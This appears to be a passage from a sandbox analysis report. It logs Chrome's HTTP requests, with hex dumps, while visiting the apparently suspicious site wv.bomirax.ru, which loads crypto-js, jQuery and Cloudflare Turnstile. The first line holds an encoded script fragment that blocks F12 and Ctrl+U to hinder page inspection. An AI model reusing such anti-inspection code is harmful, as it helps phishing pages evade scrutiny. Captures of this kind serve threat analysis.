                                                                          Data Ascii: V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBld


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.449754104.17.25.144434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:26 UTC647OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:26 UTC968INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:26 GMT
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"61182885-40eb"
                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 549237
                                                                          Expires: Sun, 04 Jan 2026 21:50:26 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfGxNC7qofIyMDvZJXnPky%2FnVa2mQ0xd5WgY%2FA%2BJaIs1yfAIub65X3q%2BYkCismEmWeGBQHL1FE95LICuQ%2FSMUn6KjxHynPl%2FhCIqAr26PNKSIkr5Tc24PxX2jqcl%2Fj%2B7cHk5Rami"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7798e336a58-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:26 UTC401INData Raw: 37 62 65 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                          Data Ascii: 7be9!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f
                                                                          Data Ascii: d"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=O
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61
                                                                          Data Ascii: =o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.ra
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61
                                                                          Data Ascii: ring"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(va
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e
                                                                          Data Ascii: N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30
                                                                          Data Ascii: >>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74
                                                                          Data Ascii: y(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={st
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47
                                                                          Data Ascii: var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFG
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d
                                                                          Data Ascii: 96*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d
                                                                          Data Ascii: ,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.449753104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:26 UTC645OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:26 UTC386INHTTP/1.1 302 Found
                                                                          Date: Tue, 14 Jan 2025 21:50:26 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                          cross-origin-resource-policy: cross-origin
                                                                          location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7799faf41e6-EWR
                                                                          alt-svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.449752151.101.194.1374434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:26 UTC619OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:26 UTC613INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 14 Jan 2025 21:50:26 GMT
                                                                          Age: 2375953
                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 2774, 4
                                                                          X-Timer: S1736891427.841244,VS0,VE0
                                                                          Vary: Accept-Encoding
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
